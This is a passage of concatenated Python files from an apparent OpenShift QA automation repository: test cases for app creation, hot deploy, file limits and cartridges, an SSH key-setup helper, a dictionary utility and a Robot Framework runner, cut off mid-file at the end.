"Python", "length_bytes": 743, "license_type": "no_license", "max_line_length": 113, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby19_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 29, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby19_scaling_without_jenkins import 
Ruby19ScalingHotDeployWithoutJenkins\n\nclass Ruby19ScalingHotDeployWithJenkins(Ruby19ScalingHotDeployWithoutJenkins):\n    def __init__(self, config):\n        Ruby19ScalingHotDeployWithoutJenkins.__init__(self, config)\n        self.config.jenkins_is_needed = True\n        self.config.summary = \"[US2443]Hot deployment support for scalable application - with Jenkins - ruby-1.9\"\n    \nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(Ruby19ScalingHotDeployWithJenkins)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.58199542760849, "alphanum_fraction": 0.6106651425361633, "avg_line_length": 23.239999771118164, "blob_id": "00c44cab409a539266f42f6302aaca08d54d4747", "content_id": "8e78494513d1a9e74075547221e939555f085f76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 197, "num_lines": 75, "path": "/automation/open/testmodules/UI/web/case_174363.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174363.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass CreateAppWithoutSSHKey(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login()\n        #web.delete_app(\"ruby19\")\n        #create a ruby1.9 app\n        web.create_app(\"ruby-1.9\",\"ruby19\")\n\n        #check whether the links are correct\n        time.sleep(5)\n        \n        #ADD ssh key\n        web.input_by_id(\"key_raw_content\", '''ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA2AcMMWvrfpIcoHMM/SQbpdlqa8TVb5Y1lJcHovJxHzTHXb18KW7MJ2dvQZdcxfAaGboG1hq5HfUhN/mnubv0QJLsFcVKkpd5Pmi/jnM1NBN5qRo+ZvXR0lU1qssYp0fsCn8K7s6lQALApuAFb+U0vW+3o2i2cJ659TouPRnJhuOHdWmdj5cLDPQRoVh+2RhXOuXcFqryJtyruymC4r92RkikTtHhchBtv2Xsdzn8zwUIWLg3k/CcXuOIHTxw3kAMe5j2qYJ+OLJ/4L9THhA0Zg0szdTYh1k076bIXdVJOiBgUZu+tXRCy2aSn1k0rnp8graLxXx2hicD5tidmIhsBQ== root@mgao''')\n        web.driver.find_element_by_id(\"key_submit\").click()\n        time.sleep(2)\n        web.assert_text_equal_by_xpath(\"Install the Git client for your operating system, and from your command line run\",'''//div[@id='content']/div/div/div/div[2]/div/section[2]/div/div/p[6]''') \n\n\n        #delete ssh key\n        web.go_to_account()\n        web.click_element_by_xpath('''//tr[@id='default_sshkey']/td[3]/a''')\n        time.sleep(2)\n        \n        \n        \n        #delete the ruby app\n        web.delete_app(\"ruby19\")\n\n\n        self.tearDown()\n\n        return self.passed(\" case_174363--CreateAppWithoutSSHKey passed successfully.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(CreateAppWithoutSSHKey)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_174363.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5809165239334106, "alphanum_fraction": 0.593756914138794, "avg_line_length": 34.2890625, "blob_id": "e4dd40ee05ef3158af48c...", "content_id": "d530ee93bcf32cc252c9347199e86fdf30783c1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4517, "license_type": "no_license", "max_line_length": 122, "num_lines": 128, "path": 
"/automation/open/lib/auto_ssh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport commands\nimport pexpect\n\ndef remote_exec(hostname, username, password, cmd):\n #fout=file('mylog.txt','w')\n #cmd= \"grep 'hello word testing' /tmp/test/test.log\"\n #cmd=\"\"\"/bin/sh -c \"%s\" \"\"\" %(cmd)\n print \">>>\",cmd\n #child = pexpect.spawn(('ssh %s@%s %s' %(username,hostname,cmd)),timeout=6,maxread=2000,logfile=None)\n #child = pexpect.spawn(\"/usr/bin/ssh [email protected]\",[\"grep 'hello word testing' /tmp/mytest.log\"])\n #child = pexpect.spawn(\"\"\"ssh [email protected] \"grep 'hello word testing' /tmp/mytest.log\" \"\"\")\n user_hostname = \"%s@%s\" %(username,hostname)\n child = pexpect.spawn(\"/usr/bin/ssh\",[user_hostname,cmd],timeout=6,maxread=2000,logfile=None)\n child.logfile_read = sys.stdout\n #fout=file('mylog.txt','w')\n #child.logfile=fout\n\n while True:\n index = child.expect(['(yes\\/no)', 'password:', pexpect.EOF, pexpect.TIMEOUT])\n #print index\n if index == 0:\n child.sendline(\"yes\")\n elif index == 1:\n child.sendline(password)\n elif index == 2:\n return child.before\n elif index == 3:\n return \"TIMEOUT!!!\"\n\n#child.logfile_read = None # To turn off log\n\n#a=remote_exec(\"127.0.0.1\",\"root\",\"redhat\",\"cat /tmp/check.log > /tmp/test/test.log\")\n#a=remote_exec(\"127.0.0.1\",\"root\",\"redhat\",\"grep 'hello word testing' /tmp/test/test.log\")\n#print a\n\ndef ssh_key_gen(key_file=None, key_type='rsa'):\n pre_cmd = \"rm -rf %s %s.pub\" %(key_file, key_file)\n if key_file != None:\n cmd = \"%s; /usr/bin/ssh-keygen -t %s -N '' -f %s\" %(pre_cmd, key_type, key_file)\n else:\n cmd = \"%s; /usr/bin/ssh-keygen -t %s -N ''\" %(pre_cmd, key_type)\n print \"Command: %s\" %(cmd)\n return commands.getstatusoutput(cmd)\n\ndef ssh_copy_id(pub_key_file, username, password, hostname):\n user_hostname = \"%s@%s\" %(username, hostname)\n cmd = \"ssh-copy-id -i %s %s\" %(pub_key_file, user_hostname)\n print \"Command: %s\" %(cmd)\n child = pexpect.spawn(cmd, timeout=30, maxread=2000, logfile=None)\n child.logfile_read = sys.stdout\n while True:\n index = child.expect(['(yes\\/no)', 'password:', pexpect.EOF, pexpect.TIMEOUT])\n #print index\n if index == 0:\n child.sendline(\"yes\")\n elif index == 1:\n child.sendline(password)\n elif index == 2:\n break\n elif index == 3:\n print \"TIMEOUT!!! Try ssh connect manually!\"\n break\n\n #print \"-----%s-------\" %(child.before)\n\n if child.before.find(\"Now try logging into the machine\") != -1:\n return 0\n else:\n print \"ssh-copy-id is terminated abnormally, pls check!!!\"\n return 1\n\n \n\n\ndef main():\n usage = \"\"\"\nusage: %s -i target_host -u username -p password [-f key_file] [-t key_type]\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.add_option(\"-i\", \"--target_host\", dest=\"target_host\", help=\"setup auto ssh between local host and target host\")\n parser.add_option(\"-u\", \"--username\", dest=\"username\", help=\"username for logging into target host\")\n parser.add_option(\"-p\", \"--password\", dest=\"password\", help=\"password for loggint into target host\")\n parser.add_option(\"-f\", \"--key_file\", dest=\"key_file\", help=\"specify generated key file. Default: mykey (optional)\")\n parser.add_option(\"-t\", \"--key_type\", dest=\"key_type\", help=\"specify generated key type. 
Default: rsa (optional)\")\n\n (options, args) = parser.parse_args()\n if options.target_host == None or options.username == None or options.password == None:\n print usage\n sys.exit(1)\n \n if options.key_file == None:\n key_file = \"mykey\"\n else:\n key_file = options.key_file\n\n if options.key_type == None:\n key_type = \"rsa\" \n else:\n key_type = options.key_type\n\n (ret, output) = ssh_key_gen(key_file, key_type)\n print output\n if ret == 0:\n if ssh_copy_id(\"%s.pub\" %(key_file), options.username, options.password, options.target_host) != 0:\n return 1\n else:\n print \"fail to generate ssh key file\"\n return ret\n\n cmd = \"ssh -i %s %s@%s 'free -m'\" %(key_file, options.username, options.target_host)\n print \"Command: %s\" %(cmd)\n (ret, output)=commands.getstatusoutput(cmd)\n print output\n if ret == 0:\n return 0\n else:\n return 1\n\n\n\nif __name__ == \"__main__\":\n exit_code=main()\n sys.exit(exit_code)\n" }, { "alpha_fraction": 0.6007992625236511, "alphanum_fraction": 0.6083481311798096, "avg_line_length": 26.80246925354004, "blob_id": "3ca9b990fcb56c6b5e3fb3ba36888a27a076e601", "content_id": "4a45a181b7745c2293b24d6527745e05b07f938c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2252, "license_type": "no_license", "max_line_length": 99, "num_lines": 81, "path": "/automation/open/testmodules/RT/limits/file_count.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport subprocess\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types['php']\n self.file_count_limit = 40000\n tcms_testcase_id=122322\n \tcommon.env_setup()\n self.steps_list = []\n\n def finalize(self):\n common.destroy_app(self.app_name)\n os.system(\"rm -rf %s\"%self.app_name)\n\n\nclass FileCount(OpenShiftTest):\n\n def gen_files(self):\n for i in range(0, self.file_count_limit):\n retcode = subprocess.call(''.join([\"touch %s/tmp.\"%self.app_name, str(i)]), shell=True)\n return retcode\n\n def test_method(self):\n\n step = testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"generate %s files\"% self.file_count_limit,\n self.gen_files,\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . 
&& git commit -am 'update app' && git push\" % self.app_name,\n expect_string_list = ['Disk quota exceeded'])\n# expect_return = 0)\n\n\n case = testcase.TestCase(\"[rhc-limits] file count limit\", self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(FileCount)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5868465304374695, "alphanum_fraction": 0.6172006726264954, "avg_line_length": 19.084745407104492, "blob_id": "2b837c32ae385b025d46ddbf8ad6afff0988ef0c", "content_id": "6176503b9eeb2de5fcdb00acc8ee1b94ebb86677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 65, "num_lines": 59, "path": "/automation/open/testmodules/UI/web/case_147640.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_147640.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_wiki_page(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Check wiki page\n web.go_to_community()\n time.sleep(5)\n web.click_element_by_link_text(\"Open Source\")\n time.sleep(5)\n web.click_element_by_link_text(\"Index\")\n time.sleep(5)\n web.check_title(\"Wiki Index | OpenShift by Red Hat\") \n \n self.tearDown()\n\n return self.passed(\"Case 147640 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_wiki_page)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_147640.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6694214940071106, "alphanum_fraction": 0.671192467212677, "avg_line_length": 34.29166793823242, "blob_id": "77e435940e4b095cc19c3ce064ad6da4c3064271", "content_id": "98e58469c31efb96890f99959cf1d4598ae4b246", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1694, "license_type": "no_license", "max_line_length": 103, "num_lines": 48, "path": "/automation/open/testmodules/RT/quick_start/quick_start_nodejs_custom_version.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartNodeJSCustomVersion(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"nodejs\"]\n self.config.application_nodejs_custom_version = \"0.9.1\"\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: NodeJS Custom Version\"\n 
self.config.git_upstream_url = \"git://github.com/openshift/nodejs-custom-version-openshift.git\"\n self.config.page = \"env\"\n self.config.page_pattern = \"Version: v\" + self.config.application_nodejs_custom_version\n\n def post_configuration_steps(self):\n self.log_info(\"Post Configuration Steps\")\n marker = open(\"./%s/.openshift/markers/NODEJS_VERSION\" % self.config.application_name, \"w\")\n marker.write(self.config.application_nodejs_custom_version)\n marker.close()\n\n def pre_deployment_steps(self):\n self.log_info(\"Pre Deployment Steps\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git commit -a -m NODEJS_VERSION\"\n ]\n return common.command_get_status(\" && \".join(steps))\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartNodeJSCustomVersion)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6553381681442261, "alphanum_fraction": 0.6594576239585876, "avg_line_length": 31, "blob_id": "eb5f66a1ffa4e09b5d2a6bf1156fea95be4f79da", "content_id": "6abbfdd1285449c2edae1b3b52a43980b00a4270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2913, "license_type": "no_license", "max_line_length": 79, "num_lines": 91, "path": "/automation/robot_to_testlink/RF-Template/run-test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n'''Selenium Library Demo Runner\n\nUsage: rundemo.py [options] datasource\n\nThis script starts necessary helper programs (a simple HTTP server and Selenium\nserver) and executes the given test case file/directory. After test cases have\nfinished executing, the helper programs are shut down.\n\nOptions are passed to Robot Framework as they are given, for a complete list\nof options, run 'pybot --help'.\n\nBy default, tests are executed with Firefox browser, this can be changed by\nusing command line option '--variable', eg. '--variable BROWSER:ie'. Selenium\nLibrary documentation lists the accepted values of browser.\n\nThe speed of the test execution can be slowed by defining a non-zero value for\nvariable delay, eg. 
'--variable DELAY:2'\n\nFor debugging purposes, the output of Selenium server is written in\n'selenium_log.txt' under the 'reports' directory.\n\nRequires that Robot Framework, Selenium Library, Python 2.4 or newer and\nJava 1.5 or newer are installed.\n'''\n\nimport os\nimport sys\nimport time\nimport tempfile\nfrom subprocess import Popen, call, STDOUT\nfrom time import strftime\nimport ConfigParser\n\nimport SeleniumLibrary\nfrom SeleniumLibrary import selenium\n\nINSTPATH = os.path.split(os.path.abspath(SeleniumLibrary.__file__))[0]\nTMPFILE = tempfile.TemporaryFile()\nCURRENTTIME = strftime(\"%Y-%m-%d_%H%M%S\")\nREPORTDIR = 'Reports_' + CURRENTTIME\nif not os.path.exists(REPORTDIR):\n os.mkdir(REPORTDIR)\n\nSELENIUM_LOG_FILE = open(os.path.join(REPORTDIR, 'selenium_log.txt'), 'w')\nDEFAULT_ARGS = [\n'--outputdir', REPORTDIR,\n'--log', 'Logs.html',\n'--report', 'Report.html',\n'--summary', 'Summary.html',\n'--debugfile', 'Debug.txt',\n'--output', 'Output.xml',\n'--reporttitle', 'Selenium_Report',\n'--logtitle', 'Selenium_Log']\n\ndef run_demo(cmdline_args):\n shell = (os.sep == '\\\\')\n call(['pybot'] + DEFAULT_ARGS + cmdline_args, shell=shell)\n print 'Selenium log:', os.path.abspath(SELENIUM_LOG_FILE.name)\n\ndef read_cfg():\n #read config file\n filename = 'testconfig.ini'\n cp = ConfigParser.ConfigParser()\n x = cp.read(filename)\n sections = cp.sections()\n for parameter in sections:\n value = cp.options(parameter)\n items = cp.items(parameter)\n for x in items:\n variable_name = x[0]\n variable_value = x[1]\n final_value = variable_name+':'+variable_value\n option = '--variable'\n DEFAULT_ARGS.append(option)\n DEFAULT_ARGS.append(final_value)\n\nif __name__ == '__main__':\n read_cfg()\n print \"-----------------------------------------------------------\"\n print \"The following parameters have been passed: \"\n print DEFAULT_ARGS\n print \"-----------------------------------------------------------\"\n if len(sys.argv) < 2 or '--help' in sys.argv[1]:\n print __doc__\n sys.exit(1)\n run_demo(sys.argv[1:])\n\n SELENIUM_LOG_FILE.close()\n TMPFILE.close()\n\n" }, { "alpha_fraction": 0.6121483445167542, "alphanum_fraction": 0.6228528618812561, "avg_line_length": 34.85714340209961, "blob_id": "b96e03d433dca9ac6bbaf6dcd8c92f5a522b331d", "content_id": "a92cc8ab3eec71c13f1f8d8cdc7d57be8fb09e99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4017, "license_type": "no_license", "max_line_length": 136, "num_lines": 112, "path": "/automation/open/testmodules/RT/cartridge/rack_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]Rack / Rails Framework Support\nhttps://tcms.engineering.redhat.com/case/122285/\n\"\"\"\nimport os,sys,re,time,stat\nimport testcase,common,OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]Rack / Rails Framework Support\"\n self.app_name = \"rackframework\"\n self.app_type = common.app_types[\"rack\"]\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n tcms_testcase_id=122285\n self.deploy_rails_file = \"%s/deploy_rails_app.sh\" % (self.git_repo)\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RackFrameworkSupport(OpenShiftTest): \n\n def create_script(self):\n context = \"\"\"#!/bin/sh\nset -x 
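# xtrace: print each command as it runs, as a debugging aid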
\nrails new %s -f\ncd %s \necho \"gem 'execjs'\" >>Gemfile\necho \"gem 'therubyracer'\" >>Gemfile\nbundle install\nrails generate controller home index\necho '<h1>Hello, Rails</h1>' >> app/views/home/index.html.erb\nrm -rf public/index.html\nsed -i '5 iroot :to => \"home#index\"' config/routes.rb\nsed -i -E 's/config.assets.compile = false/config.assets.compile = true/g' config/environments/production.rb\nbundle install --deployment\ngit add . && git add -f .bundle && git commit -m \"test\" && git push\"\"\" %(self.git_repo, self.git_repo)\n try:\n f = open(self.deploy_rails_file, 'w')\n f.write(context)\n f.close()\n os.chmod(self.deploy_rails_file, 0777)\n except Exception as e:\n self.info(\"Failed to create deploy_rails_app.sh under local git repo: %s\"%str(e))\n return 1\n\n self.info(\"Successfully created deploy_rails_app.sh under local git repo\")\n return 0\n\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an rack app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n # 2.Create deploy_rails_app.sh under local git repo\n self.steps_list.append(testcase.TestCaseStep(\"2.Create deploy_rails_app.sh under local git repo\",\n self.create_script,\n expect_description=\"Successfully created deploy_rails_app.sh under local git repo\",\n expect_return=0))\n\n # 3.Run deploy_rails_app.sh\n self.steps_list.append(testcase.TestCaseStep(\"3.Run deploy_rails_app.sh\",\n \"bash %s\" % (self.deploy_rails_file),\n expect_description=\"Script executed successfully\",\n expect_return=0))\n\n # 4.Check app via browser\n test_html = \"Hello, Rails\"\n self.steps_list.append(testcase.TestCaseStep(\"4.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RackFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6408054232597351, "alphanum_fraction": 0.6467278599739075, "avg_line_length": 25.170541763305664, "blob_id": "5c3bb2223a2b9398863909ab92a745296f784b76", "content_id": "dd2cd7780d19d69cd44c347fcf504704b0848c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3377, "license_type": "no_license", "max_line_length": 78, "num_lines": 129, "path": "/automation/open/lib/dictlib.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# \n#\t Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n#\t This library is free software; you can redistribute it and/or\n#\t modify it under the terms of 
the GNU Lesser General Public\n#\t License as published by the Free Software Foundation; either\n#\t version 2.1 of the License, or (at your option) any later version.\n#\n#\t This library is distributed in the hope that it will be useful,\n#\t but WITHOUT ANY WARRANTY; without even the implied warranty of\n#\t MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n#\t Lesser General Public License for more details.\n\n\"\"\"\nHelpers and tools for dictionary objects.\n\n\"\"\"\n\nclass AttrDictWrapper(object):\n\t\"\"\"Wraps any mapping object with the ability to get to its contents using\n\tattribute access syntax (dot). Note that you cannot have any contained keys\n\tthat match an attribute name.\"\"\"\n\tdef __init__(self, mapping=None):\n\t\tself.__dict__[\"_mapping\"] = mapping or {}\n\n\t# attribute-style access \n\tdef __getattribute__(self, key):\n\t\ttry:\n\t\t\treturn super(AttrDictWrapper, self).__getattribute__(key)\n\t\texcept AttributeError:\n\t\t\ttry:\n\t\t\t\treturn self.__dict__[\"_mapping\"].__getattribute__( key)\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\tobj = self.__dict__[\"_mapping\"].__getitem__(key)\n\t\t\t\t\tif hasattr(obj, \"keys\"):\n\t\t\t\t\t\treturn self.__class__(obj) # wrap the returned mapping object also\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn obj\n\t\t\t\texcept KeyError, err:\n\t\t\t\t\traise AttributeError, \"no attribute or key '%s' found (%s).\" % (key, err)\n\n\tdef __setattr__(self, key, obj):\n\t\tif self.__class__.__dict__.has_key(key): # property access\n\t\t\tobject.__setattr__(self, key, obj)\n\t\telse:\n\t\t\treturn self.__dict__[\"_mapping\"].__setitem__(key, obj)\n\n\tdef __delattr__(self, key):\n\t\ttry: # to force handling of properties\n\t\t\tself.__dict__[\"_mapping\"].__delitem__(key)\n\t\texcept KeyError:\n\t\t\tobject.__delattr__(self, key)\n\n\tdef __getitem__(self, key):\n\t\tobj = self._mapping[key]\n\t\tif hasattr(obj, \"keys\"):\n\t\t\treturn self.__class__(obj) # wrap the returned mapping object also\n\t\telse:\n\t\t\treturn obj\n\n\tdef __delitem__(self, key):\n\t\tdel self._mapping[key]\n\n\tdef __setitem__(self, key, obj):\n\t\tself._mapping[key] = obj\n\n\t\nclass AttrDict(dict):\n\t\"\"\"A dictionary with attribute-style access. It maps attribute access to\n\tthe real dictionary. 
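A minimal illustrative sketch:\n\n\t\td = AttrDict({'one': 1})\n\t\td.two = 2\t# same as d['two'] = 2\n\t\tprint d.one\t# attribute read maps to d['one']\n\t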
\"\"\"\n\tdef __init__(self, init={}):\n\t\tdict.__init__(self, init)\n\n\tdef __getstate__(self):\n\t\treturn self.__dict__.items()\n\n\tdef __setstate__(self, items):\n\t\tfor key, val in items:\n\t\t\tself.__dict__[key] = val\n\n\tdef __repr__(self):\n\t\treturn \"%s(%s)\" % (self.__class__.__name__, dict.__repr__(self))\n\n\tdef __setitem__(self, key, value):\n\t\treturn super(AttrDict, self).__setitem__(key, value)\n\n\tdef __getitem__(self, name):\n\t\treturn super(AttrDict, self).__getitem__(name)\n\n\tdef __delitem__(self, name):\n\t\treturn super(AttrDict, self).__delitem__(name)\n\n\t__getattr__ = __getitem__\n\t__setattr__ = __setitem__\n\n\tdef copy(self):\n\t\tch = AttrDict(self)\n\t\treturn ch\n\n\ndef _test(argv):\n\tld = {\"one\":1, \"two\":2, \"three\":3}\n\tgd = {\"gbone\":1, \"gbtwo\":2, \"gbthree\":3}\n\tlw = AttrDictWrapper(ld)\n\tlw.four = gd\n\tprint lw.one\n\tprint lw.two\n\tprint lw.four.gbone\n\tprint lw.four[\"gbtwo\"]\n\n\td = AttrDict()\n\td.one = \"one\"\n\tprint d\n\tprint d.get\n\tprint d.one\n\tprint d[\"one\"]\n\td[\"two\"] = 2\n\tprint d.two\n\tprint d[\"two\"]\n\n\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.6167749762535095, "alphanum_fraction": 0.6224614381790161, "avg_line_length": 39.024391174316406, "blob_id": "4e8e0b3585f6ecd03b4c268bae5a51fca978d844", "content_id": "7ca09645b31af78b41287034dad5284c8558d382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4924, "license_type": "no_license", "max_line_length": 190, "num_lines": 123, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_perl.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to PERL application\nhttps://tcms.engineering.redhat.com/case/122450/?from_plan=4962\n\"\"\"\nimport os\nimport sys\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_type = common.app_types[\"perl\"]\n self.app_name = \"perl\"+common.getRandomString(7)\n self.summary = \"[rhc-cartridge] embed MySQL instance to PERL application\"\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToPerl(OpenShiftTest):\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql.pl\", 'Jeremy')\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a PERL app\", common.create_app, \n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def add_page(app_name):\n new_page = \"\"\"#!/usr/bin/perl\nprint \"Content-type: text/plain\\\\r\\\\n\\\\r\\\\n\";\nprint \" \\n\";\nuse DBI;\nmy $dbname = $ENV{\"OPENSHIFT_APP_NAME\"};\nmy $location = $ENV{\"OPENSHIFT_MYSQL_DB_HOST\"};\nmy $port = $ENV{'OPENSHIFT_MYSQL_DB_PORT'};\nmy $database = 
